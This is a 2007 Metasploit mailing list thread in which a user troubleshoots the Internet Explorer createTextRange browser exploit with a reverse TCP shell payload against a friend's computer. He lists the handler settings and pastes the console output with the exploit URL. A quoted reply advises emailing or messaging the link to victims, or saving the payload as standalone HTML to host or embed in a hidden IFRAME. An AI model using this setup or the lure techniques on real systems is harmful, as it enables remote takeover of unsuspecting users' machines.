Metasploit mailing list archives
Internet Explorer createTextRange() Code Execution
From: eresemeth at gmail.com (Rory Garton Smith)
Date: Wed, 4 Apr 2007 19:34:08 +0800
Thank you all for responding so fast. I did what you said, however it didn't quite work.

My friend and I were trying to exploit his computer this time, using the same as before (windows/browser/ms06_013_createtextrange) with the payload as (generic/shell_reverse_tcp). My local IP is 10.1.1.5; his router IP is (for the sake of conversation) 124.181.130.145.

I set up the exploit so that:

SRVHOST - 10.1.1.5
SRVPORT - 49160 (A port I have forwarded from my router to my computer which is 10.1.1.5 obviously)
LHOST - 124.181.130.145 (His IP)
LPORT - 5000 (A port he has forwarded from his router)

This exploit ran in the console and came out with the same as last time:

[*] Started reverse handler
[*] Using URL: http://10.1.1.5:49160/PwPYpHE
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_013_createtextrange) >

Upon this, I did as was suggested previously, and sent him the URL http://10.1.1.5:49160/PwPYpHE and then opened it myself in Internet Explorer, as did he. However, all that came up was a series of numbers moving upwards towards 100.

He has no firewalls on and neither do I. He was using Internet Explorer 6, which is the target I was using as well.

I'm sure there is some critical error I made... perhaps confusing server and host or similar?

Any assistance would be wildly appreciated.

Thank you so much, sorry to trouble,
Erez

On 4/4/07, Donnie Werner <morning_wood at frame4.com> wrote:

> All of the browser exploits work the same way -- you run the exploit, the exploit creates a listening web server and a URL handler. To get code execution, you need to send vulnerable clients to your web server. How you do this depends on the situation, but the easiest way is to just email or instant message the link to the victims.
>
> I have had very good success with client side exploits in Metasploit. My best results come from launching the exploit, create a local html file pointing to the exploit server. Open file via browser, right click link and save as. What you have now is a standalone html file with all the code in it. Simply host this file or embed as an IFRAME, send your targets to your hosted file. enjoy! This has worked nearly flawlessly, and there is no need to keep your MSF open, running, or listening.
>
> cheers,
> Donnie ( M.W ) Werner
> http://www.zone-h.org